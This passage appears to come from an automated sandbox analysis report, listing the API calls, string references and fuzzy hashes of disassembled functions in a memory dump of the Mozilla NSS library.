                                                                                                                                                                                                                                                        • Part of subcall function 6C4BC3D0: PK11_ImportPublicKey.NSS3(?,?,00000000), ref: 6C4BC45D
                                                                                                                                                                                                                                                        • Part of subcall function 6C4BC3D0: TlsGetValue.KERNEL32 ref: 6C4BC494
                                                                                                                                                                                                                                                        • Part of subcall function 6C4BC3D0: EnterCriticalSection.KERNEL32(?), ref: 6C4BC4A9
                                                                                                                                                                                                                                                        • Part of subcall function 6C4BC3D0: PR_Unlock.NSS3(?), ref: 6C4BC4F4
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Value$ArenaCriticalEnterSectionUnlockUtil$Alloc_AllocateErrorFindImportK11_Mark_PublicTag_
                                                                                                                                                                                                                                                      • String ID: <+Nl
                                                                                                                                                                                                                                                      • API String ID: 2538134263-2237628156
                                                                                                                                                                                                                                                      • Opcode ID: 595581cd8a3e58213a728435827faa4a7978b5385ddb469e9c4028bda8901334
                                                                                                                                                                                                                                                      • Instruction ID: c287604cf340fe1ea6c0460f3ccbc1df82e26030b2e104b932eb8692938b116a
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 595581cd8a3e58213a728435827faa4a7978b5385ddb469e9c4028bda8901334
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0311C4B6A001046BDB00DE64DC00F9B77AA9B85279F1A8138EC1CD7790E772E915C7E1
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                        • Part of subcall function 6C53CD70: PR_LoadLibrary.NSS3(ws2_32.dll,?,?,?,6C53CC7B), ref: 6C53CD7A
                                                                                                                                                                                                                                                        • Part of subcall function 6C53CD70: PR_FindSymbol.NSS3(00000000,getaddrinfo), ref: 6C53CD8E
                                                                                                                                                                                                                                                        • Part of subcall function 6C53CD70: PR_FindSymbol.NSS3(00000000,freeaddrinfo), ref: 6C53CDA5
                                                                                                                                                                                                                                                        • Part of subcall function 6C53CD70: PR_FindSymbol.NSS3(00000000,getnameinfo), ref: 6C53CDB8
                                                                                                                                                                                                                                                      • PR_GetUniqueIdentity.NSS3(Ipv6_to_Ipv4 layer), ref: 6C53CCB5
                                                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(6C5D14F4,6C5D02AC,00000090), ref: 6C53CCD3
                                                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(6C5D1588,6C5D02AC,00000090), ref: 6C53CD2B
                                                                                                                                                                                                                                                        • Part of subcall function 6C459AC0: socket.WSOCK32(?,00000017,6C4599BE), ref: 6C459AE6
                                                                                                                                                                                                                                                        • Part of subcall function 6C459AC0: ioctlsocket.WSOCK32(00000000,8004667E,00000001,?,00000017,6C4599BE), ref: 6C459AFC
                                                                                                                                                                                                                                                        • Part of subcall function 6C460590: closesocket.WSOCK32(6C459A8F,?,?,6C459A8F,00000000), ref: 6C460597
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: FindSymbol$memcpy$IdentityLibraryLoadUniqueclosesocketioctlsocketsocket
                                                                                                                                                                                                                                                      • String ID: Ipv6_to_Ipv4 layer
                                                                                                                                                                                                                                                      • API String ID: 1231378898-412307543
                                                                                                                                                                                                                                                      • Opcode ID: ac2b3202054891969072743bb4959f1abcd13bab9cf48b95bd193201cc593f13
                                                                                                                                                                                                                                                      • Instruction ID: 8c8b29e72057abea4f5a9f5cdbc56e4fab84a335fadff71d1693fb485923b6ef
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ac2b3202054891969072743bb4959f1abcd13bab9cf48b95bd193201cc593f13
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: AD1160F5B223609EEB009F599C06B433AF89396628F161129E41ACBB42E775F4044FDE
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • calloc.MOZGLUE(00000001,00000028,00000000,?,?,6C490715), ref: 6C488859
                                                                                                                                                                                                                                                      • PR_NewLock.NSS3 ref: 6C488874
                                                                                                                                                                                                                                                        • Part of subcall function 6C5398D0: calloc.MOZGLUE(00000001,00000084,6C460936,00000001,?,6C46102C), ref: 6C5398E5
                                                                                                                                                                                                                                                      • PL_InitArenaPool.NSS3(-00000008,NSS,00000800,00000008), ref: 6C48888D
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: calloc$ArenaInitLockPool
                                                                                                                                                                                                                                                      • String ID: NSS
                                                                                                                                                                                                                                                      • API String ID: 2230817933-3870390017
                                                                                                                                                                                                                                                      • Opcode ID: 4224ba73fd64e82cc36a6b0b616ff129ce42623541326b54f46f93a21e3f45af
                                                                                                                                                                                                                                                      • Instruction ID: 83ae5b79a9eeee0ba2137285c0c493b6a77a46551982ed91300c40fcd75f5841
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4224ba73fd64e82cc36a6b0b616ff129ce42623541326b54f46f93a21e3f45af
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C1F0F662E4362033F210A2696C06F8775989F9275EF040035E90CA3B82EB52E50883E3
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,000116BB,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,?,?,?,?,6C52A4E2), ref: 6C53B8C6
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      • 9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C53B8B0
                                                                                                                                                                                                                                                      • %s at line %d of [%.10s], xrefs: 6C53B8BF
                                                                                                                                                                                                                                                      • database corruption, xrefs: 6C53B8BA
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: sqlite3_log
                                                                                                                                                                                                                                                      • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
                                                                                                                                                                                                                                                      • API String ID: 632333372-598938438
                                                                                                                                                                                                                                                      • Opcode ID: f7e665d45c6a4c34ff1ba07b0e9efe87daecec31c564059afcd5b94db99f4fe2
                                                                                                                                                                                                                                                      • Instruction ID: 0fc32b8c75f50bf91a1e4708d79bcce523934fbd6ac58943a71718733ed659d0
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f7e665d45c6a4c34ff1ba07b0e9efe87daecec31c564059afcd5b94db99f4fe2
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0F0149329481A0A9D310DB7A5C94D937FBC9F8531570B01C9FA446F3B3E212C802C3E1
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(?), ref: 6C4081DF
                                                                                                                                                                                                                                                      • LeaveCriticalSection.KERNEL32(?), ref: 6C408239
                                                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(00000000,?,00000000), ref: 6C408255
                                                                                                                                                                                                                                                      • sqlite3_free.NSS3(00000000), ref: 6C408260
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: CriticalSection$EnterLeavememcpysqlite3_free
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 1525636458-0
                                                                                                                                                                                                                                                      • Opcode ID: 60b6e31b6c6986ed9c6c7015aaaee0fda872f99f5e3f7c1808f213273373ed10
                                                                                                                                                                                                                                                      • Instruction ID: 5aedd396dadee67c696c436e6268cbec7b1e1be259a2ae1a181577f3814397ba
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 60b6e31b6c6986ed9c6c7015aaaee0fda872f99f5e3f7c1808f213273373ed10
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F5919B71B816088BEB04DFE0DE49FADB7B1BF06305F16403ED416AB640DB396945CB8A
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • PORT_ArenaMark_Util.NSS3(?), ref: 6C4E1D8F
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D14C0: TlsGetValue.KERNEL32 ref: 6C4D14E0
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D14C0: EnterCriticalSection.KERNEL32 ref: 6C4D14F5
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D14C0: PR_Unlock.NSS3 ref: 6C4D150D
                                                                                                                                                                                                                                                      • PORT_ArenaAlloc_Util.NSS3(?,?), ref: 6C4E1DA6
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D10C0: TlsGetValue.KERNEL32(?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D10F3
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D10C0: EnterCriticalSection.KERNEL32(?,?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D110C
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D10C0: PL_ArenaAllocate.NSS3(?,?,?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D1141
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D10C0: PR_Unlock.NSS3(?,?,?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D1182
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D10C0: TlsGetValue.KERNEL32(?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D119C
                                                                                                                                                                                                                                                      • SECITEM_ArenaDupItem_Util.NSS3(?,00000000), ref: 6C4E1E13
                                                                                                                                                                                                                                                      • PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C4E1ED0
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: ArenaUtil$Value$CriticalEnterSectionUnlock$Alloc_AllocateArena_FreeItem_Mark_
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 84796498-0
                                                                                                                                                                                                                                                      • Opcode ID: f7223f3220f5b96438945335279ee27fe37ba1cc190a4f04edc4a7c5f879d44f
                                                                                                                                                                                                                                                      • Instruction ID: 231a26998dc301a4b09e16a835918b02cc32040d2ddb5e336be79b45d47258a6
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f7223f3220f5b96438945335279ee27fe37ba1cc190a4f04edc4a7c5f879d44f
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2A514675A403098BDB00CF98C884FAEB7B6BF4931AF164129E81A9B752D731E945CB90
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(00000000,00000000,?,?,00000001,?,6C4185D2,00000000,?,?), ref: 6C534FFD
                                                                                                                                                                                                                                                      • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C53500C
                                                                                                                                                                                                                                                      • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C5350C8
                                                                                                                                                                                                                                                      • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C5350D6
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: _byteswap_ulong
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 4101233201-0
                                                                                                                                                                                                                                                      • Opcode ID: c1842a32e4e7e127450c3a2af53b9f41a547574912252666c9cd46b28f398346
                                                                                                                                                                                                                                                      • Instruction ID: 21d229a5fe89ea2fb25f629b033f3a51f0d2a9ae5c76ea73118796a6f40ad817
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c1842a32e4e7e127450c3a2af53b9f41a547574912252666c9cd46b28f398346
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F6417DB6A012218BCB18CF18DCD179AB7E1BF4431871D5669D84ACBB02F379E891CB81
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • sqlite3_initialize.NSS3(00000000,?,?,?,6C45FDFE), ref: 6C45FFAD
                                                                                                                                                                                                                                                        • Part of subcall function 6C3FCA30: EnterCriticalSection.KERNEL32(?,?,?,6C45F9C9,?,6C45F4DA,6C45F9C9,?,?,6C42369A), ref: 6C3FCA7A
                                                                                                                                                                                                                                                        • Part of subcall function 6C3FCA30: LeaveCriticalSection.KERNEL32(?), ref: 6C3FCB26
                                                                                                                                                                                                                                                      • memset.VCRUNTIME140(00000000,00000000,00000008,00000000,?,?,?,6C45FDFE), ref: 6C45FFDF
                                                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(?,?,?,?,00000000,?,?,?,6C45FDFE), ref: 6C46001C
                                                                                                                                                                                                                                                      • LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,00000000,?,?,?,6C45FDFE), ref: 6C46006F
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: CriticalSection$EnterLeave$memsetsqlite3_initialize
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 2358433136-0
                                                                                                                                                                                                                                                      • Opcode ID: 63b188da15b7ada5db23269b4da4f025dc893a3581ee799a1cc4ae35154e34e6
                                                                                                                                                                                                                                                      • Instruction ID: 975cc34d86e1ceaa033ba463a0f9b0e150c8ed643f8244cb294b80f2ec1af549
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 63b188da15b7ada5db23269b4da4f025dc893a3581ee799a1cc4ae35154e34e6
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5541ED71B002158BDB08DFA5EC85EAEB7B0FB45315F05002DD806A7B01EB3AA941CBE9
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                        • Part of subcall function 6C58A690: calloc.MOZGLUE(00000001,00000044,?,?,?,?,6C58A662), ref: 6C58A69E
                                                                                                                                                                                                                                                        • Part of subcall function 6C58A690: PR_NewCondVar.NSS3(?), ref: 6C58A6B4
                                                                                                                                                                                                                                                      • PR_IntervalNow.NSS3 ref: 6C58A8C6
                                                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(?), ref: 6C58A8EB
                                                                                                                                                                                                                                                      • _PR_MD_UNLOCK.NSS3(?), ref: 6C58A944
                                                                                                                                                                                                                                                      • PR_SetPollableEvent.NSS3(?), ref: 6C58A94F
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: CondCriticalEnterEventIntervalPollableSectioncalloc
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 811965633-0
                                                                                                                                                                                                                                                      • Opcode ID: 7cfc1330e3eb48d672cfbaaec6d9a35c54425f9c8fbff917622fc46a91cb1772
                                                                                                                                                                                                                                                      • Instruction ID: e3846dac8e25f295d322a2b58b9beb2c163f84e87a849ad2926ae8ab1988c1ec
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7cfc1330e3eb48d672cfbaaec6d9a35c54425f9c8fbff917622fc46a91cb1772
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: FB4137B4A06A22DFC704CF29C98095AFBF1FF88318725856AD959CBB51E731E850CF90
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C547E10
                                                                                                                                                                                                                                                      • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C547EA6
                                                                                                                                                                                                                                                      • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C547EB5
                                                                                                                                                                                                                                                      • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(00000000), ref: 6C547ED8
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: _byteswap_ulong
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 4101233201-0
                                                                                                                                                                                                                                                      • Opcode ID: 68fd819e4aa8e36df1224ea11687829a8446297eaaca2911829ad9927b1d0bc6
                                                                                                                                                                                                                                                      • Instruction ID: 729386f416a8a38842f4134daee79746ecc5324be2f3268c2bbbe254574dae3a
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 68fd819e4aa8e36df1224ea11687829a8446297eaaca2911829ad9927b1d0bc6
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4231A4B1A011118FDB04CF18CC9099EBBE2BFC831871B8669C8585BB12EB71EC55CBD1
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                        • Part of subcall function 6C483090: PORT_NewArena_Util.NSS3(00000800,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6C49AE42), ref: 6C4830AA
                                                                                                                                                                                                                                                        • Part of subcall function 6C483090: PORT_ArenaAlloc_Util.NSS3(00000000,000000AC,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C4830C7
                                                                                                                                                                                                                                                        • Part of subcall function 6C483090: memset.VCRUNTIME140(-00000004,00000000,000000A8), ref: 6C4830E5
                                                                                                                                                                                                                                                        • Part of subcall function 6C483090: SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C483116
                                                                                                                                                                                                                                                        • Part of subcall function 6C483090: SECITEM_CopyItem_Util.NSS3(00000000,?,?), ref: 6C48312B
                                                                                                                                                                                                                                                        • Part of subcall function 6C483090: PK11_DestroyObject.NSS3(?,?), ref: 6C483154
                                                                                                                                                                                                                                                        • Part of subcall function 6C483090: PORT_FreeArena_Util.NSS3(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C48317E
                                                                                                                                                                                                                                                      • SECKEY_CopyPrivateKey.NSS3(00000000,?,?,?,?,?,?,?,?,?,?,?,?,6C4FDBBD), ref: 6C4FDFCF
                                                                                                                                                                                                                                                      • SECKEY_DestroyPrivateKey.NSS3(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C4FDFEE
                                                                                                                                                                                                                                                        • Part of subcall function 6C4986D0: PK11_Authenticate.NSS3(?,00000001,?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 6C498716
                                                                                                                                                                                                                                                        • Part of subcall function 6C4986D0: TlsGetValue.KERNEL32(?,?,?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 6C498727
                                                                                                                                                                                                                                                        • Part of subcall function 6C4986D0: EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C49873B
                                                                                                                                                                                                                                                        • Part of subcall function 6C4986D0: PR_Unlock.NSS3(?), ref: 6C49876F
                                                                                                                                                                                                                                                        • Part of subcall function 6C4986D0: PR_SetError.NSS3(00000000,00000000), ref: 6C498787
                                                                                                                                                                                                                                                        • Part of subcall function 6C4BF820: free.MOZGLUE(6A1B7500,2404110F,?,?), ref: 6C4BF854
                                                                                                                                                                                                                                                        • Part of subcall function 6C4BF820: free.MOZGLUE(FFD3F9E8,2404110F,?,?), ref: 6C4BF868
                                                                                                                                                                                                                                                        • Part of subcall function 6C4BF820: DeleteCriticalSection.KERNEL32(04C4841B,2404110F,?,?), ref: 6C4BF882
                                                                                                                                                                                                                                                        • Part of subcall function 6C4BF820: free.MOZGLUE(04C483FF,?,?), ref: 6C4BF889
                                                                                                                                                                                                                                                        • Part of subcall function 6C4BF820: DeleteCriticalSection.KERNEL32(CCCCCCDF,2404110F,?,?), ref: 6C4BF8A4
                                                                                                                                                                                                                                                        • Part of subcall function 6C4BF820: free.MOZGLUE(CCCCCCC3,?,?), ref: 6C4BF8AB
                                                                                                                                                                                                                                                        • Part of subcall function 6C4BF820: DeleteCriticalSection.KERNEL32(280F1108,2404110F,?,?), ref: 6C4BF8C9
                                                                                                                                                                                                                                                        • Part of subcall function 6C4BF820: free.MOZGLUE(280F10EC,?,?), ref: 6C4BF8D0
                                                                                                                                                                                                                                                      • SECKEY_DestroyPublicKey.NSS3(00000000,?,?,6C4FDBBD), ref: 6C4FDFFC
                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE013,00000000,?,?,6C4FDBBD), ref: 6C4FE007
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Utilfree$CriticalSection$DeleteDestroy$Arena_CopyErrorK11_Private$AlgorithmAlloc_ArenaAuthenticateEnterFreeItem_ObjectPublicTag_UnlockValuememset
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 3730430729-0
                                                                                                                                                                                                                                                      • Opcode ID: 3ac3b98e3f5be8536b347307e4a21c6e1f2f725d792f7386c4d39a7d5fc2ffa8
                                                                                                                                                                                                                                                      • Instruction ID: 422770f80ad250f4658458c3f5237ea45c6302ac3342e1bf4af9b36e86da6a40
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3ac3b98e3f5be8536b347307e4a21c6e1f2f725d792f7386c4d39a7d5fc2ffa8
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9831E4B0A0520157E700EE79AC85F9B73B89F8530DF050139E91AD7B12FB25E909C2F2
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • PORT_ArenaAlloc_Util.NSS3(?,00000001), ref: 6C476C8D
                                                                                                                                                                                                                                                      • memset.VCRUNTIME140(00000000,00000000,00000001), ref: 6C476CA9
                                                                                                                                                                                                                                                      • PORT_ArenaAlloc_Util.NSS3(?,0000000C), ref: 6C476CC0
                                                                                                                                                                                                                                                      • SEC_ASN1EncodeItem_Util.NSS3(?,00000000,?,6C598FE0), ref: 6C476CFE
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Util$Alloc_Arena$EncodeItem_memset
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 2370200771-0
                                                                                                                                                                                                                                                      • Opcode ID: 244385f3578d83f37ca9adba8f98bf9d1577fd52ab100560e848372b7bb17677
                                                                                                                                                                                                                                                      • Instruction ID: ee4467573021c97f3681aa39ca6a646853cf66b353c82cec8130079f225be18b
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 244385f3578d83f37ca9adba8f98bf9d1577fd52ab100560e848372b7bb17677
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 15319EB5A012169FEB18DF65C891EFFBBFAEB45248B10442DD905D7700EB319905CBA0
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • CreateFileA.KERNEL32(?,40000000,00000003,00000000,?,?,00000000), ref: 6C584F5D
                                                                                                                                                                                                                                                      • free.MOZGLUE(?), ref: 6C584F74
                                                                                                                                                                                                                                                      • free.MOZGLUE(?), ref: 6C584F82
                                                                                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 6C584F90
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: free$CreateErrorFileLast
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 17951984-0
                                                                                                                                                                                                                                                      • Opcode ID: 6aca86e0f592b39e87ab1cf1ef6b8ee23b938de03b229daa086d3256f519f972
                                                                                                                                                                                                                                                      • Instruction ID: b737a11ea2e4bd8b229a847f1895bf220286905af329ca73929f15823929680d
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6aca86e0f592b39e87ab1cf1ef6b8ee23b938de03b229daa086d3256f519f972
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DC3148B5A016294BEB01CB69DC91BDFB3BCFF85348F05022DEC15A7780EB34A905C691
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • PORT_ArenaMark_Util.NSS3(00000000,?,00000000,00000000,?,?,6C4CDDB1,?,00000000), ref: 6C4CDDF4
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D14C0: TlsGetValue.KERNEL32 ref: 6C4D14E0
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D14C0: EnterCriticalSection.KERNEL32 ref: 6C4D14F5
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D14C0: PR_Unlock.NSS3 ref: 6C4D150D
                                                                                                                                                                                                                                                      • PORT_ArenaAlloc_Util.NSS3(?,00000054,?,00000000,00000000,?,?,6C4CDDB1,?,00000000), ref: 6C4CDE0B
                                                                                                                                                                                                                                                      • PORT_Alloc_Util.NSS3(00000054,?,00000000,00000000,?,?,6C4CDDB1,?,00000000), ref: 6C4CDE17
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D0BE0: malloc.MOZGLUE(6C4C8D2D,?,00000000,?), ref: 6C4D0BF8
